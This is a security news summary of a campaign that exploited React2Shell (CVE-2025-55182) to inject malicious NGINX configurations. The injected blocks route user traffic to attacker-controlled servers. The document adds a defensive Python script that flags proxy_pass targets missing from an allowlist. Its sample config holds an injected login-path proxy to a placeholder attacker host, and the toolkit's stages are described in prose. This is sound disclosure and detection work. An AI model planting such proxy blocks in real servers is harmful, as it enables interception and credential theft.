
"Datadog Security Labs said it observed threat actors associated with the recent React2Shell (CVE-2025-55182, CVSS score: 10.0) exploitation using malicious NGINX configurations to pull off the attack. "The malicious configuration intercepts legitimate web traffic between users and websites and routes it through attacker-controlled backend servers," security researcher Ryan Simon said. "The campaign targets Asian TLDs (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure (Baota Panel), and government and educational TLDs (.edu, .gov).""
"zx.sh, which acts as the orchestrator to execute subsequent stages through legitimate utilities like curl or wget. In the event that the two programs are blocked, it creates a raw TCP connection to send an HTTP request
bt.sh, which targets the Baota (BT) Management Panel environment to overwrite NGINX configuration files
4zdh.sh, which enumerates common Nginx configuration locations and takes steps to minimize errors when creating the new configuration
zdh.sh, which adopts a narrower targeting approach by focusing mainly on Linux or containerized NGINX confi"
Threat actors exploited React2Shell (CVE-2025-55182) to inject malicious NGINX configuration entries that intercept and proxy legitimate web requests through attacker-controlled backend servers. The operation captures incoming requests on predefined URL paths and redirects them using the proxy_pass directive to attacker domains. Targeting focuses on Asian TLDs (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure such as Baota (BT) Panel, and government and educational TLDs (.edu, .gov). The activity uses a multi-stage shell-script toolkit to achieve persistence, enumerate NGINX config locations, overwrite configuration files, and fall back to raw TCP if curl or wget are blocked.
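The injected configuration described above works by adding location blocks whose proxy_pass points at an upstream the operator never configured. A defender can catch that by parsing the NGINX config and comparing every proxy_pass host against an allowlist of known upstreams. The following script is an added example written for this page, not code from Datadog Security Labs or from the campaign; the sample config, the allowlist, and the hostname attacker-backend.invalid are constructed placeholders, not indicators from the report.

```python
import re

# Constructed sample NGINX config modelled on the behaviour described above:
# two legitimate upstreams plus an injected location that proxies a predefined
# path to an unexpected backend. The hostname is a placeholder, not a real IoC.
SAMPLE_CONFIG = """
server {
    listen 80;
    server_name portal.example.gov.invalid;

    location /api/ {
        proxy_pass http://127.0.0.1:8080;
    }

    location /login {
        proxy_pass http://attacker-backend.invalid;
    }

    location /static/ {
        proxy_pass http://app_upstream;
    }
}
"""

# Upstream hosts the site is expected to proxy to (assumption: site-specific,
# would normally come from the operator's deployment inventory).
ALLOWED_UPSTREAMS = {"127.0.0.1", "localhost", "app_upstream"}

# Matches "location [modifier] <path> {" and "proxy_pass <target>;" lines.
LOCATION_RE = re.compile(r"location\s+(?:[=~*^]+\s+)?(\S+)\s*\{")
PROXY_PASS_RE = re.compile(r"proxy_pass\s+(\S+?)\s*;")


def upstream_host(target):
    """Return the host portion of a proxy_pass target, dropping scheme, port and path."""
    target = re.sub(r"^[a-z]+://", "", target)
    host = target.split("/", 1)[0]
    if re.match(r".+:\d+$", host):
        host = host.rsplit(":", 1)[0]
    return host


def find_proxy_pass(config_text):
    """Return (location_path, proxy_pass_target) pairs, tracking the enclosing location block."""
    current_location = None
    results = []
    for line in config_text.splitlines():
        loc = LOCATION_RE.search(line)
        if loc:
            current_location = loc.group(1)
        pp = PROXY_PASS_RE.search(line)
        if pp:
            results.append((current_location, pp.group(1)))
    return results


def suspicious_proxies(config_text, allowed=ALLOWED_UPSTREAMS):
    """Return proxy_pass entries whose upstream host is not on the allowlist."""
    return [
        (loc, target)
        for loc, target in find_proxy_pass(config_text)
        if upstream_host(target) not in allowed
    ]


if __name__ == "__main__":
    for loc, target in suspicious_proxies(SAMPLE_CONFIG):
        print(f"ALERT: location {loc} proxies to unexpected upstream {target}")
```

Run it against the files NGINX actually loads (the output of nginx -T is the simplest way to get the fully merged configuration, including anything dropped into conf.d or a panel-managed directory), and treat any proxy_pass to a host outside the allowlist, especially on authentication or login paths, as something to investigate rather than silently normalise.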
Read at The Hacker News